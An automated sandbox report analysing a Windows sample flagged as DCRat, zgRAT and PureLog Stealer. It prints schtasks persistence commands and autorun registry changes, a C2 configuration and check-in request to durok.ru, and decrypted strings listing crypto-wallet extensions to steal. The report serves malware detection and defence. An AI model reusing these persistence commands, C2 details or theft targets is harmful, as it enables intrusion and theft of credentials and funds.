Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Z4D3XAZ2jB.exe

Overview

General Information

Sample name:Z4D3XAZ2jB.exe
renamed because original name is a hash value
Original sample name:0a5d9cd0a4b6abdbb272262811774a8d.exe
Analysis ID:1581018
MD5:0a5d9cd0a4b6abdbb272262811774a8d
SHA1:9571472c5d0899e517e1c1f84c6c05dfd2abb2b5
SHA256:9c2ad3d80258af2508987d952dd5a7744bedbdd16260e4f76412ea6696774285
Tags:exeZyklonuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains potential unpacker
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Z4D3XAZ2jB.exe (PID: 2004 cmdline: "C:\Users\user\Desktop\Z4D3XAZ2jB.exe" MD5: 0A5D9CD0A4B6ABDBB272262811774A8D)
    • schtasks.exe (PID: 3616 cmdline: schtasks.exe /create /tn "servicess" /sc MINUTE /mo 12 /tr "'C:\Windows\GameBarPresenceWriter\services.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 2188 cmdline: schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Windows\GameBarPresenceWriter\services.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6452 cmdline: schtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\Windows\GameBarPresenceWriter\services.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 2120 cmdline: schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 14 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6412 cmdline: schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFc" /sc ONLOGON /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7128 cmdline: schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 14 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 3368 cmdline: schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\windows multimedia platform\ZDtOzYsYYWKWEhNYzFc.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 2308 cmdline: schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFc" /sc ONLOGON /tr "'C:\Program Files (x86)\windows multimedia platform\ZDtOzYsYYWKWEhNYzFc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 3616 cmdline: schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\windows multimedia platform\ZDtOzYsYYWKWEhNYzFc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 4144 cmdline: schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\windows defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 2120 cmdline: schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFc" /sc ONLOGON /tr "'C:\Program Files (x86)\windows defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 5480 cmdline: schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\windows defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 5252 cmdline: schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 10 /tr "'C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 7132 cmdline: schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFc" /sc ONLOGON /tr "'C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 6412 cmdline: schtasks.exe /create /tn "ZDtOzYsYYWKWEhNYzFcZ" /sc MINUTE /mo 8 /tr "'C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 5252 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\7aQ0YIT0mX.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7220 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 7252 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
      • ZDtOzYsYYWKWEhNYzFc.exe (PID: 7384 cmdline: "C:\Program Files (x86)\windows defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe" MD5: 0A5D9CD0A4B6ABDBB272262811774A8D)
  • services.exe (PID: 2308 cmdline: C:\Windows\GameBarPresenceWriter\services.exe MD5: 0A5D9CD0A4B6ABDBB272262811774A8D)
  • services.exe (PID: 7176 cmdline: C:\Windows\GameBarPresenceWriter\services.exe MD5: 0A5D9CD0A4B6ABDBB272262811774A8D)
  • ZDtOzYsYYWKWEhNYzFc.exe (PID: 7208 cmdline: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe MD5: 0A5D9CD0A4B6ABDBB272262811774A8D)
  • ZDtOzYsYYWKWEhNYzFc.exe (PID: 7244 cmdline: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe MD5: 0A5D9CD0A4B6ABDBB272262811774A8D)
  • services.exe (PID: 7468 cmdline: "C:\Windows\GameBarPresenceWriter\services.exe" MD5: 0A5D9CD0A4B6ABDBB272262811774A8D)
  • ZDtOzYsYYWKWEhNYzFc.exe (PID: 7964 cmdline: "C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe" MD5: 0A5D9CD0A4B6ABDBB272262811774A8D)
  • services.exe (PID: 8136 cmdline: "C:\Windows\GameBarPresenceWriter\services.exe" MD5: 0A5D9CD0A4B6ABDBB272262811774A8D)
  • ZDtOzYsYYWKWEhNYzFc.exe (PID: 2188 cmdline: "C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe" MD5: 0A5D9CD0A4B6ABDBB272262811774A8D)
  • services.exe (PID: 5296 cmdline: "C:\Windows\GameBarPresenceWriter\services.exe" MD5: 0A5D9CD0A4B6ABDBB272262811774A8D)
  • ZDtOzYsYYWKWEhNYzFc.exe (PID: 3916 cmdline: "C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe" MD5: 0A5D9CD0A4B6ABDBB272262811774A8D)
  • services.exe (PID: 7192 cmdline: "C:\Windows\GameBarPresenceWriter\services.exe" MD5: 0A5D9CD0A4B6ABDBB272262811774A8D)
  • ZDtOzYsYYWKWEhNYzFc.exe (PID: 7424 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exe" MD5: 0A5D9CD0A4B6ABDBB272262811774A8D)
  • ZDtOzYsYYWKWEhNYzFc.exe (PID: 7540 cmdline: "C:\Program Files (x86)\windows multimedia platform\ZDtOzYsYYWKWEhNYzFc.exe" MD5: 0A5D9CD0A4B6ABDBB272262811774A8D)
  • ZDtOzYsYYWKWEhNYzFc.exe (PID: 7828 cmdline: "C:\Program Files (x86)\windows defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exe" MD5: 0A5D9CD0A4B6ABDBB272262811774A8D)
  • ZDtOzYsYYWKWEhNYzFc.exe (PID: 2208 cmdline: "C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exe" MD5: 0A5D9CD0A4B6ABDBB272262811774A8D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://durok.ru/JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "false", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "false", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000010.00000002.2938691750.00000000029B6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
    00000000.00000002.1739517961.000000001B1E0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
      00000000.00000002.1739517961.000000001B1E0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        00000010.00000002.2938691750.00000000023C1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
          00000010.00000002.2938691750.0000000002B8B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
            Click to see the 5 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.Z4D3XAZ2jB.exe.1b1e0000.22.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
              0.2.Z4D3XAZ2jB.exe.1b1e0000.22.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0.2.Z4D3XAZ2jB.exe.1b1e0000.22.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                  0.2.Z4D3XAZ2jB.exe.1b1e0000.22.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Files With System Process Name In Unsuspected Locations
                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\Z4D3XAZ2jB.exe, ProcessId: 2004, TargetFilename: C:\Windows\GameBarPresenceWriter\services.exe
                    Sigma detected: System File Execution Location Anomaly
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Windows\GameBarPresenceWriter\services.exe, CommandLine: C:\Windows\GameBarPresenceWriter\services.exe, CommandLine|base64offset|contains: , Image: C:\Windows\GameBarPresenceWriter\services.exe, NewProcessName: C:\Windows\GameBarPresenceWriter\services.exe, OriginalFileName: C:\Windows\GameBarPresenceWriter\services.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\GameBarPresenceWriter\services.exe, ProcessId: 2308, ProcessName: services.exe
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Windows\GameBarPresenceWriter\services.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Z4D3XAZ2jB.exe, ProcessId: 2004, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services
                    Sigma detected: CurrentVersion NT Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Windows\GameBarPresenceWriter\services.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Z4D3XAZ2jB.exe, ProcessId: 2004, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                    Sigma detected: Windows Processes Suspicious Parent Directory
                    Source: Process startedAuthor: vburov: Data: Command: C:\Windows\GameBarPresenceWriter\services.exe, CommandLine: C:\Windows\GameBarPresenceWriter\services.exe, CommandLine|base64offset|contains: , Image: C:\Windows\GameBarPresenceWriter\services.exe, NewProcessName: C:\Windows\GameBarPresenceWriter\services.exe, OriginalFileName: C:\Windows\GameBarPresenceWriter\services.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\GameBarPresenceWriter\services.exe, ProcessId: 2308, ProcessName: services.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-26T17:17:12.161494+010020480951A Network Trojan was detected192.168.2.449730104.21.93.16280TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: Z4D3XAZ2jB.exeAvira: detected
                    Antivirus detection for URL or domain
                    Source: http://durok.ru/JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.phpAvira URL Cloud: Label: malware
                    Antivirus detection for dropped file
                    Source: C:\Users\user\Desktop\fxzonGoL.logAvira: detection malicious, Label: HEUR/AGEN.1362695
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeAvira: detection malicious, Label: TR/Dropper.Gen
                    Source: C:\Users\user\Desktop\dVPxoyeA.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                    Source: C:\Users\user\Desktop\OquQxqjY.logAvira: detection malicious, Label: HEUR/AGEN.1362695
                    Source: C:\Users\user\Desktop\CNYkWNAB.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                    Source: C:\Users\user\Desktop\YALoKruW.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                    Source: C:\Users\user\Desktop\RbOZahUq.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                    Source: C:\Users\user\Desktop\KInsUcJl.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                    Source: C:\Users\user\Desktop\NPGqEfku.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                    Source: C:\Users\user\Desktop\MgNITBew.logAvira: detection malicious, Label: TR/Agent.jbwuj
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeAvira: detection malicious, Label: TR/Dropper.Gen
                    Source: C:\Users\user\Desktop\UAeHorhP.logAvira: detection malicious, Label: TR/Agent.jbwuj
                    Source: C:\Users\user\Desktop\MoHhbGed.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                    Source: C:\Users\user\AppData\Local\Temp\7aQ0YIT0mX.batAvira: detection malicious, Label: BAT/Delbat.C
                    Found malware configuration
                    Source: 00000000.00000002.1721629037.0000000013120000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://durok.ru/JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "false", "6": "true", "7": "true", "8": "true", "9": "true", "10": "true", "11": "false", "12": "true", "13": "true", "14": "true"}}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeReversingLabs: Detection: 63%
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeReversingLabs: Detection: 63%
                    Source: C:\Users\user\Desktop\ADqcsYvZ.logReversingLabs: Detection: 25%
                    Source: C:\Users\user\Desktop\CNYkWNAB.logReversingLabs: Detection: 70%
                    Source: C:\Users\user\Desktop\GmHIOoGs.logReversingLabs: Detection: 20%
                    Source: C:\Users\user\Desktop\HtvJqEPI.logReversingLabs: Detection: 20%
                    Source: C:\Users\user\Desktop\MgNITBew.logReversingLabs: Detection: 50%
                    Source: C:\Users\user\Desktop\MoHhbGed.logReversingLabs: Detection: 50%
                    Source: C:\Users\user\Desktop\NPGqEfku.logReversingLabs: Detection: 70%
                    Source: C:\Users\user\Desktop\PFcqhLrW.logReversingLabs: Detection: 37%
                    Source: C:\Users\user\Desktop\SYphwgjk.logReversingLabs: Detection: 29%
                    Source: C:\Users\user\Desktop\UAeHorhP.logReversingLabs: Detection: 50%
                    Source: C:\Users\user\Desktop\ZeYGhBeG.logReversingLabs: Detection: 20%
                    Source: C:\Users\user\Desktop\bCyXfazS.logReversingLabs: Detection: 37%
                    Source: C:\Users\user\Desktop\eJTFZLay.logReversingLabs: Detection: 25%
                    Source: C:\Users\user\Desktop\hdUdukKE.logReversingLabs: Detection: 29%
                    Source: C:\Users\user\Desktop\lyXnXruh.logReversingLabs: Detection: 29%
                    Source: C:\Users\user\Desktop\oPsvdwHZ.logReversingLabs: Detection: 29%
                    Source: C:\Users\user\Desktop\qmplAoJV.logReversingLabs: Detection: 20%
                    Source: C:\Users\user\Desktop\tWJuefum.logReversingLabs: Detection: 50%
                    Source: C:\Users\user\Desktop\wySLBGmi.logReversingLabs: Detection: 20%
                    Source: C:\Users\user\Desktop\yKbtGcJa.logReversingLabs: Detection: 20%
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeReversingLabs: Detection: 63%
                    Source: C:\Windows\GameBarPresenceWriter\services.exeReversingLabs: Detection: 63%
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeReversingLabs: Detection: 63%
                    Multi AV Scanner detection for submitted file
                    Source: Z4D3XAZ2jB.exeVirustotal: Detection: 59%Perma Link
                    Source: Z4D3XAZ2jB.exeReversingLabs: Detection: 63%
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\Desktop\ZeYGhBeG.logJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\HtvJqEPI.logJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\fxzonGoL.logJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\dVPxoyeA.logJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\OquQxqjY.logJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\CNYkWNAB.logJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\YALoKruW.logJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\RbOZahUq.logJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\KInsUcJl.logJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\NPGqEfku.logJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Windows Defender\en-GB\ZDtOzYsYYWKWEhNYzFc.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\CFoRreZv.logJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: Z4D3XAZ2jB.exeJoe Sandbox ML: detected
                    Sample uses string decryption to hide its real strings
                    Source: 00000010.00000002.2938691750.00000000023C1000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Custom","_1":"True","_2":"True","_3":"False"},"31395ecd-4eed-48b9-a47f-81dbcc84ccdf":{"_0":"True","_1":"nkbihfbeogaeaoehlefnkodbefgpgknn:MetaMask\nejbalbakoplchlghecdalmeeeajnimhm:MetaMask\nibnejdfjmmkpcnlpebklmnkoeoihofec:TronLink\nfnjhmkhhmkbjkkabndcnnogagogbneec:Ronin\nkjmoohlgokccodicjjfebfomlbljgfhk:Ronin\nfhbohimaelbohpjbbldcngcnapndodjp:BinanceChain\nbfnaelmomeimhlpmgjnjophhpkkoljpa:Phantom\nnphplpgoakhhjchkkhmiggakijnkhfnd:TONWeb\nffnbelfdoeiohenkjibnmadjiehjhajb:Yoroi\nakoiaibnepcedcplijmiamnaigbepmcb:Yoroi\nafbcbjpbpfadlkmhmclhkeeodmamcflc:MathWallet\nhnfanknocfeofbddgcijnmhnfnkdnaad:Coinbase\nimloifkgjagghnncjkhggdhalmcnfklk:TrezorPM\nilgcnhelpchnceeipipijaljkblbcobl:GAuth\noeljdldpnmdbchonielidgobddffflal:EOS\ncjelfplplebdjjenllpjcblmjkfcffne:JaxxLiberty\nlgmpcpglpngdoalbgeoldeajfclnhafa:SafePal\naholpfdialjgjfhomihkjbmgjidlcdno:Exodus","_2":"Current User","_3":"True"},"8c7d95c1-4def-4a0e-952b-f3c453358f2e":{"_0":"","_1":"One directory"}}
                    Source: 00000010.00000002.2938691750.00000000023C1000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["0ZiyUgT4v73HV4hv6xcju2UmgOimfs6FheRRPsxFY1gJB1cOaXiapug7F6RG7rZDBxk0mPfN9XK2WKlpwULIJfax8UMTbrIrccINRllL1VbRjnl4UlTmfR3fWw2SDMvR","a35fc7c35ac07669507f238ec6844456a8c9fb2c4761bbe6ae2ce46e1ccb54df","0","","","1","1","WyIxIiwie1NZU1RFTURSSVZFfS9Vc2Vycy97VVNFUk5BTUV9L0FwcERhdGEvTG9jYWwvc3RhdGljZmlsZS5leGUiLCI1Il0=","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHRXbWhpU0U1c1NXbDNhVTVwU1RaSmJsSjVaRmRWYVV4RFNUTkphbTlwWkVoS01WcFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzFhYUdKSVRteEphWGRwVFZSSmFVOXBTakJqYmxac1NXbDNhVTFVVFdsUGFVb3dZMjVXYkVscGQybE5WRkZwVDJsS01HTnVWbXhKYmpBOUlsMD0iXQ=="]
                    Source: 00000010.00000002.2938691750.00000000023C1000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://durok.ru/","JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral"]]
                    Source: Z4D3XAZ2jB.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: Z4D3XAZ2jB.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile opened: C:\Users\userJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile opened: C:\Users\user\AppDataJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                    Source: C:\Users\user\Desktop\Z4D3XAZ2jB.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh0_2_00007FFD9B9194AD
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 4x nop then jmp 00007FFD9B7A28B6h16_2_00007FFD9B7A26AE
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh16_2_00007FFD9B9494AD
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 4x nop then jmp 00007FFD9B7A28B6h19_2_00007FFD9B7A26AE
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 4x nop then jmp 00007FFD9B7828B6h28_2_00007FFD9B7826AE
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 4x nop then jmp 00007FFD9B7828B6h31_2_00007FFD9B7826AE
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 4x nop then jmp 00007FFD9B7A28B6h32_2_00007FFD9B7A26AE
                    Source: C:\Windows\twain_32\ZDtOzYsYYWKWEhNYzFc.exeCode function: 4x nop then jmp 00007FFD9B7828B6h34_2_00007FFD9B7826AE
                    Source: C:\Windows\GameBarPresenceWriter\services.exeCode function: 4x nop then jmp 00007FFD9B7A28B6h35_2_00007FFD9B7A26AE
                    Source: C:\Windows\BitLockerDiscoveryVolumeContents\ZDtOzYsYYWKWEhNYzFc.exeCode function: 4x nop then jmp 00007FFD9B7828B6h36_2_00007FFD9B7826AE
                    Source: C:\Program Files (x86)\Windows Multimedia Platform\ZDtOzYsYYWKWEhNYzFc.exeCode function: 4x nop then jmp 00007FFD9B7828B6h37_2_00007FFD9B7826AE

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49730 -> 104.21.93.162:80
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: global trafficHTTP traffic detected: POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: durok.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
